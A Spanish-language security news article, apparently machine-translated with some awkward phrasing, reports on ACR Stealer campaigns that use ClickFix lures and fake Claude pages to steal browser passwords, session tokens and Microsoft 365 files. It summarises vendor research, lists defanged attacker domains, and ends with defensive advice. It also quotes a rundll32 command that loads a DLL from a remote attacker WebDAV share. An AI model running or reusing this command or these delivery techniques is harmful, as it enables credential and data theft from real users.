ACR Stealer utiliza señuelos ClickFix para robar tokens del navegador y archivos de Microsoft 365

ACR Stealer, un ladrón de información en circulación desde 2024, está saliendo de las redes empresariales con contraseñas de navegador guardadas, tokens de sesión en vivo, archivos PDF, documentos de Microsoft 365 y archivos de carpetas sincronizadas de OneDrive y SharePoint.

Entra porque alguien pegó un comando en un cuadro Ejecutar y presionó Enter. microsoft establecido dos de las cadenas de entrega el jueves. Su equipo Defender Experts, el brazo de detección administrado de la compañía, había observado el aumento de la actividad de ACR Stealer en los entornos de los clientes desde finales de abril hasta mediados de junio, y dice que las campañas están «utilizando con éxito señuelos ClickFix para robar credenciales de navegador, tokens de autenticación y documentos confidenciales».

Ambas cadenas se abren con el mismo mensaje y luego se dividen: una deja rastros en el disco, la otra se ejecuta casi por completo en la memoria. La guía de remediación de Microsoft les dice a las víctimas que revoquen los tokens, no solo que roten las contraseñas.

Una carga útil en los píxeles

El mensaje probablemente llegue a través de publicidad maliciosa o resultados de búsqueda manipulados por SEO, según el informe. La cadena sin archivos comienza cuando se genera el comando pegado mshta.exe para extraer contenido HTA remoto. Un cargador de VBScript integrado se apoya en objetos COM para decodificar y activar PowerShell; esa etapa genera una identificación de víctima, deshabilita la validación de certificados y ejecuta lo que recupera en la memoria.

Lo que recupera es un JPEG de un servidor de imágenes, con la carga útil en los píxeles. Las rutinas personalizadas lo crean, lo descifran, lo descomprimen y lo ejecutan de manera reflexiva. Luego va por Chrome y Edge, leyendo el Login Data y Web Data bases de datos e invocar DPAPI para descifrar las contraseñas, cookies y tokens que contienen. Los archivos PDF en el escritorio y en Descargas también van.

El 26 de mayo, Brad Duncan, responsable del SANS Internet Storm Center documentó una infección de Windows rastreó hasta una página que se hacía pasar por Claude, el asistente de inteligencia artificial de Anthropic, a la que se accedía a través de anuncios maliciosos de Google y que a menudo se escondía detrás sites.google.com URL. La página ofrecía instrucciones de macOS cuando se abría en una Mac y instrucciones de Windows cuando se abría en Windows.

Ciberseguridad

Microsoft nunca nombra el señuelo. Dos de los indicadores de su tabla de la Campaña 2, creativecommunityinfo[.]art y enhanceblabber[.]ccfiguran como host de carga útil y C2. The Hacker News comparó ambos con la cadena de Duncan, que recorría los subdominios de cada uno siete semanas antes, y el informe de Microsoft cita su diario entre las referencias.

Esa cadena también sacó un JPEG de 628 KB de ImgBB, un servicio de alojamiento de imágenes. Lo marcó como parte de la infección y no obtuvo nada: «tampoco pude encontrar ningún signo evidente de datos incrustados».

canario rojo había registrado señuelos de la marca Claude un mes antes, entregando ACR Stealer a través de páginas falsas de Claude Code en GitLab, como claude-desktop[.]gitlab[.]io.

La otra cadena deja huellas

La primera cadena de Microsoft escribe en el disco, lo que deja a los defensores más con qué trabajar. El comando pegado extrae una DLL directamente de un recurso compartido WebDAV a través de HTTPS, utilizando un directorio GUID y un nombre de archivo creado para pasar como otra cosa; el ejemplo del informe es google.ct.

Red Canary publicó la misma forma en su informe de mayo, a partir de la telemetría de abril, semanas antes del artículo de Microsoft:

"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Dos de las tres variantes que Defender Experts vio utilizar pushd Primero debe montar el recurso compartido remoto como una unidad local temporal, de modo que la carga útil se ejecute a través de lo que parece una ruta local. El más sigiloso envuelve eso en conhost.exe --headless para cerrar la ventana de la consola y oculta las cadenas para pushd, rundll32y el host remoto detrás de la expansión retrasada de las variables de entorno.

Lo que sigue es PowerShell ofuscado. Coloca un ZIP en una carpeta debajo %LocalAppData%\Temp con un nombre inofensivo; El ejemplo de Microsoft es LogiOptionsPlus. un paquete pythonw.exe luego inicia el script Python, por lo que no aparece nada en la pantalla. El instalador borra las copias más antiguas antes de realizar la instalación, lo que lo convierte en un actualizador.

Persiste a través de una tarea programada oculta que se hace pasar por una actualización de software, copia marcas de tiempo notepad.exe en sus propios archivos y borra el historial de PowerShell detrás de él. La última etapa permanece en la memoria y se ejecuta a través de la API de Windows Fiber.

En un subconjunto de estas intrusiones, un segundo cargador de Python se comunica con los puntos finales RPC públicos de blockchain y la infraestructura de nodos Web3, probablemente extrayendo una carga útil o una dirección C2 de un libro de contabilidad público. Microsoft llama a la técnica EtherHiding: coloque el puntero en un contrato inteligente y no quedará ningún solucionador controlado por el atacante que aprovechar.

Sin errores, sin números

Ninguna cadena explota una vulnerabilidad. Ambos heredan exactamente lo que el usuario que inició sesión ya tiene, y cada capa posterior, el montaje WebDAV, la extracción de píxeles y la transferencia en memoria, solo se ejecuta porque una persona leyó un mensaje y presionó Enter. No hay CVE en esta historia. La aplicación de parches no elimina la ruta de pegar y ejecutar.

Microsoft dice que los señuelos están funcionando, pero nunca lo cuantifica. El informe no proporciona un recuento de víctimas, ni un número de clientes afectados, ni una base de referencia para el aumento que informa.

La telemetría de abril de Red Canary al menos tiene números. ClearFake, un clúster de inyección web que ha estado alimentando a ACR Stealer desde al menos marzo de 2025, ocupó el puesto número uno en su lista de amenazas más frecuentes por primera vez ese mes, y ACR Stealer entró entre los diez primeros empatando en el sexto lugar.

Ciberseguridad

El clúster se entrega a través de JavaScript inyectado en sitios comprometidos y el informe de Microsoft no lo menciona en ninguna de las cadenas.

¿De quién es este ladrón?

Microsoft tiene cuidado con lo que afirma. Vincula la actividad con ACR Stealer según el comportamiento observado y el arte posterior a la explotación, se compara con lo que se sabe públicamente sobre la infraestructura de la familia y no nombra ningún actor de amenaza. La precaución se gana.

ACR, también escrito como AcridRain, fue comercializado en foros de habla rusa por un actor conocido como SheldIO, que cerró las ventas en julio de 2024. Las cuentas se dividieron sobre lo que sucedió después. eSentire dice que el código fuente se vendió. El relato de Proofpoint difiere: el mismo canal de Telegram anunció el cierre, no un adiós del equipo, y el panel de Amatera apareció cinco meses después.

En cuanto al cambio de marca, están de acuerdo. Punto de prueba reportado en junio de 2025 que «ACR Stealer fue significativamente actualizado y renombrado como Amatera Stealer», con un precio de $199 por mes a $1,499 por año. Red Canary trata a ACR y Amatera como una familia y evalúa al propio ACR como un GrMsk Stealer actualizado.

Una detección de julio de 2026 denominada ACR Stealer es una llamada de comportamiento en una base de código cuyo nombre ha cambiado al menos una vez y puede haber cambiado de propietario. La etiqueta describe el código. No te dice quién lo dirige.

donde detenerlo

Un control se encuentra antes de cada técnica anterior: ninguna cadena se ejecuta sin que un usuario pegue un comando en el cuadro de diálogo Ejecutar.

  • Corta el vector. eSentire recomienda eliminar el mensaje Ejecutar a través de GPO y bloquear mshta.exe a través de AppLocker o WDAC.
  • Utilice reglas de control de aplicaciones y reducción de la superficie de ataque para que PowerShell, Python, mshta.exey rundll32.exe no puede iniciar contenido entregado por Internet desde Downloads, Tempo %LocalAppData%.
  • Caza rundll32.exe ejecutándose sin parámetros de línea de comando mientras se establece una conexión de red, que es la oportunidad de detección de Red Canary para esta familia. Agregue tareas programadas que se hacen pasar por actualizaciones de software, tiempos de espera y borrado del historial de PowerShell.
  • En un host sospechoso, aísle, rote credenciales, revoque tokens y verifique las conexiones salientes a recursos compartidos remotos y servicios de alojamiento de imágenes.

Microsoft envió tres consultas de búsqueda de Defender XDR y 16 dominios de campaña con el informe.

Esos indicadores son una porción, y el informe así lo dice: representativos, no el rango completo de la familia, con más campañas e infraestructura probablemente activas. Los dominios rotan. La pregunta en el frente no, porque funciona. Los señuelos se superponen en lugar de reemplazarse: Red Canary vio CAPTCHA falsos y páginas de Claude falsas en la misma telemetría de abril.

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *